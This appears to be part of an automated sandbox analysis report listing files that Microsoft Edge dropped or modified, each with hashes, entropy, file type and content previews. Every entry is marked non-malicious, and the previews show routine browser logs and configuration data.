                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):311
                                                                                                                                                                                                                                                                          Entropy (8bit):5.198416574379778
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv3tRM1CHhJ23oH+Tcwtk2WwnvB2KLl5vZrVq2PCHhJ23oH+Tcwtk2WwnvIFUv:7JRAYebkxwnvFL5ZvBYebkxwnQFUv
                                                                                                                                                                                                                                                                          MD5:62A38A39625A88AC15AB6CA2B547224A
                                                                                                                                                                                                                                                                          SHA1:2E268DA47F7858D1AFE2B121D9287951935A3DAA
                                                                                                                                                                                                                                                                          SHA-256:A2D965C6D0EC19A596BB6C1C5C233C55DA488057B37E3937060F771F1BB844FE
                                                                                                                                                                                                                                                                          SHA-512:28DDC388EBFBFAB8A5F8D9AFB9803D2BCE0C2154520456ED0C0F169FCE0249FEA8555101DFEA302F29D1C84DF8D86831E1D2B2131DFFB1DBF961D30A24672EFB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:42.347 1004 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/09-08:55:43.159 1004 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):358860
                                                                                                                                                                                                                                                                          Entropy (8bit):5.324612966877732
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rq:C1gAg1zfvC
                                                                                                                                                                                                                                                                          MD5:1E5A9C0BDB0E3A3C15C792419E3B5022
                                                                                                                                                                                                                                                                          SHA1:BCAEB3933BE2DB50FCD22069F90D57A1A92AEB7D
                                                                                                                                                                                                                                                                          SHA-256:43F902408E3D259285F90ED6C1A63E5E66984B6D52504B793467E37CB2ED65B3
                                                                                                                                                                                                                                                                          SHA-512:2DA7D1E8BA9EADB2D2883EF2F75D66CA72237E138C1F39A0923F2F92CFD2030CDF77AD41C89EE715E7016EDA559658B394487211A402AE1AED6631C364AD66E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                          Entropy (8bit):5.181817328540608
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvFVdMM+q2PCHhJ23oH+Tcwt8aPrqIFUtJvFOvZmwPvFOiMVkwOCHhJ23oH+Ts:7pN+vBYebL3FUtqv/0vV56YebQJ
                                                                                                                                                                                                                                                                          MD5:EDD7865665052A576AEDC66C13430294
                                                                                                                                                                                                                                                                          SHA1:9EF126B1CAB566AFA078C5F1C1A5CD2E065F01B6
                                                                                                                                                                                                                                                                          SHA-256:946A40790EA50831489CE08361929DD78D284FA0290DBC6D9601D005C869C9A1
                                                                                                                                                                                                                                                                          SHA-512:1D1C0C5F96E594B6EBA573788288326C510D6692570C5B5EEC6CE3F338FDB59FF952EA2A6E861E25D9714E4A81A98FD4FA2A64DD9FF8B1845BABA995FFBDDB34
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.665 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:55:35.666 eac Recovering log #3.2025/01/09-08:55:35.666 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.211922674936253
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvFEpM+q2PCHhJ23oH+Tcwt865IFUtJvFCJZmwPvFCcMVkwOCHhJ23oH+TcwtD:79+vBYeb/WFUtQ/qV56Yeb/+SJ
                                                                                                                                                                                                                                                                          MD5:6A928A881CF652340B490F3F9D0D54A9
                                                                                                                                                                                                                                                                          SHA1:18C4F89450C158143B0B6DFDE0B3B6CF1C3A2D2C
                                                                                                                                                                                                                                                                          SHA-256:70B7E9675942D1B310CFC55B688F8BD7C59AE4A906DE12D2452219CA09AD3934
                                                                                                                                                                                                                                                                          SHA-512:ADE04CF62F249F765BB0D8FAE3889B4E927BF331D0EDF2CB94B7770F68AD40821A8889013E36E14C30E5AFAD07776023E3758369387EBC8F27E1B57BE4F7E965
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.667 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:55:35.668 eac Recovering log #3.2025/01/09-08:55:35.668 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1254
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                          MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                          SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                          SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                          SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.243489470495695
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv424q2PCHhJ23oH+Tcwt8NIFUtJv46ZZmwPv4gFkwOCHhJ23oH+Tcwt8+eLJ:7sxvBYebpFUtq6Z/YgF56YebqJ
                                                                                                                                                                                                                                                                          MD5:18BFADBF50BE5F177CF2D1F3DD68E433
                                                                                                                                                                                                                                                                          SHA1:1344FCF278734A8EEE85B6C9DE14EB917B08D978
                                                                                                                                                                                                                                                                          SHA-256:CFEDB9DDF4C8F243442A5861A54F11D03A7FF00BB73E96DD897AA28EB0889C51
                                                                                                                                                                                                                                                                          SHA-512:8F849A27D073B1ADEE7F98BB37E7038C28F7AC65556ADC5D60E834D02CE07293F0ABD2B08AD45B2D7E69498E3932BF3321EECFA6439493A3464629E25A9BDEE1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.483 1ad4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:55:36.517 1ad4 Recovering log #3.2025/01/09-08:55:36.524 1ad4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                          Entropy (8bit):0.21880421027789762
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:b+vtFlljq7A/mhWJFuQ3yy7IOWUL5294dweytllrE9SFcTp4AGbNCV9RUIQYn:X75fOnrd0Xi99pEYl
                                                                                                                                                                                                                                                                          MD5:06B4876E88377570927F1852E7540E51
                                                                                                                                                                                                                                                                          SHA1:C1F1898A5432EFAB99E55C0E68E160BB9E31688A
                                                                                                                                                                                                                                                                          SHA-256:9F8498C3D4F3F2B14B032C3584A3160BB7F30BA9E20B6DEB1775146DA50172E4
                                                                                                                                                                                                                                                                          SHA-512:D4A2635C7C5BBA753ADFAA96CFD0A9824B9BE09FA4167EB1D66DBB56E572B05EDF2E97AC920E2E2ED3076BC91F2D045DAD7D408CC0072B3AEDC89F8300E3422B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                          Entropy (8bit):3.647718136575781
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:aj9P0lP/Kbt3QkQerC773pLDc7gam6IChXjl4RKToaAu:adSP/qe2C7OaSpl4RKcC
                                                                                                                                                                                                                                                                          MD5:0D4F2B61CE4979DECDC4A83722D158FD
                                                                                                                                                                                                                                                                          SHA1:92F5C5F715706998192409E942A22511904F8390
                                                                                                                                                                                                                                                                          SHA-256:4ED505DA9C305FA33D1FB0B963A31B0D34B7EB7D8FE6ACF5A7D9DAAA9FF0977F
                                                                                                                                                                                                                                                                          SHA-512:7731F6876360A251896FA8EBB3DC29E6D24A6845344728B1AF665F21CEB1A6D5EAB8A5220453119F0D2810FB3236ADB4F9C6EBBF944B39F653AB9927BBA0FC39
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):405
                                                                                                                                                                                                                                                                          Entropy (8bit):5.307348753253169
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:7mvBYeb8rcHEZrELFUt1/I56Yeb8rcHEZrEZSJ:7kBYeb8nZrExgE6Yeb8nZrEZe
                                                                                                                                                                                                                                                                          MD5:0E7C614057F0745042AD784E04EF7A9A
                                                                                                                                                                                                                                                                          SHA1:8D8155674E8675A1F0607A3C1DE7852BF22E70DE
                                                                                                                                                                                                                                                                          SHA-256:90391BE8FCBF44C7CCF4DDC4655C2676E719114FBBD31318137C6AB290E9579D
                                                                                                                                                                                                                                                                          SHA-512:C58CDAE0547B8876CBE550B39520EE1BC985B4492DBD5D5C85D0220C35738471C275CB2E13B94102093964A1B6B2148E5DAE87D9A2CF4DEDEE951688299A6BB3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:41.781 eb8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:55:41.781 eb8 Recovering log #3.2025/01/09-08:55:41.782 eb8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1598
                                                                                                                                                                                                                                                                          Entropy (8bit):5.588380738886849
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:gZGJkH7VXZ7RV03Sx497AHHk2GJ348ylsKyG:gw6bh5BZdP8osM
                                                                                                                                                                                                                                                                          MD5:6664ABDED88684DEFA57DEFFDFA30A7E
                                                                                                                                                                                                                                                                          SHA1:56AD305450D41662054042A5A29322B76E841D38
                                                                                                                                                                                                                                                                          SHA-256:02594001070B0D4CEE7132C8F4D907C6D378087F3E8FC88219341243FF3C6A35
                                                                                                                                                                                                                                                                          SHA-512:AC3DFE7ECAD6D647487E7E5B4BF946FE3271A048A206B5D8733E9B691D9A02D10DA96AEC838BCD9F4624046931FC8ED71CC763DB2909F79C4CF855441731D3D4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...7................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":919}.!_https://ntp.msn.com..LastKnownPV..1736430943889.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736430945371.._https://ntp.msn.com..MUID!.0196AA9642C66D0E1944BFF943A46C22.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736430943957,"schedule":[-1,4,33,9,-1,-1,-1],"scheduleFixed":[-1,4,33,9,-1,-1,-1],"simpleSchedule":[11,26,51,52,15,31,17]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736430943859.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250109.199"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https:/
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                          Entropy (8bit):5.189925139138666
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4Rr+q2PCHhJ23oH+Tcwt8a2jMGIFUtJv4MZZmwPv4ENVkwOCHhJ23oH+Tcw2:7sRSvBYeb8EFUtqg/YEz56Yeb8bJ
                                                                                                                                                                                                                                                                          MD5:0A65F0C6E7367199498C5838253E5FDF
                                                                                                                                                                                                                                                                          SHA1:F1ADC62B32A3C217174C18711CCA8ECAD1F86410
                                                                                                                                                                                                                                                                          SHA-256:DDA8FB756C077571BEDBFF05D2D42FA24B539096302E3070CE0EE16928BEE628
                                                                                                                                                                                                                                                                          SHA-512:04B601A50E094814F3D776A5623E7C70E9F5A2C54DB52F12FA58B7064199BAB8BF7A29A3935CA2C06ACD57F25767F0B4D0EFF4EB830D23578ABC1E686600C619
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.277 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:55:36.278 1a08 Recovering log #3.2025/01/09-08:55:36.281 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1961
                                                                                                                                                                                                                                                                          Entropy (8bit):5.296922421244929
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YcCpfgCzs0T4tsRWCIs4fcKsRVleeIkBRsRECgH1Yhbt:F2fFT4zpMkeIkBJTyhx
                                                                                                                                                                                                                                                                          MD5:E38BC9D090E5AB9A52AEDDE1BED0E754
                                                                                                                                                                                                                                                                          SHA1:68970BDBC139E56F4CFDB9DC083CC04BAFE31787
                                                                                                                                                                                                                                                                          SHA-256:2F9FA28DB98BE0DDB780073CF616522536121BD31A3C78C45BF4DEE4844F5496
                                                                                                                                                                                                                                                                          SHA-512:068358B45AD0580B1329C803E25FA34C2BD15425A07516BABDC8239E03DDDC8F554AA2C48D82BC998BB6B0BC4CF4A52E472F9173A14597B95ECA5F7FFD81C59A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383496537867062","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380990941763719","port":443,"protocol_str":"quic"}],"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets2.msn.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383496542750374","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercon
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                          Malicious:false
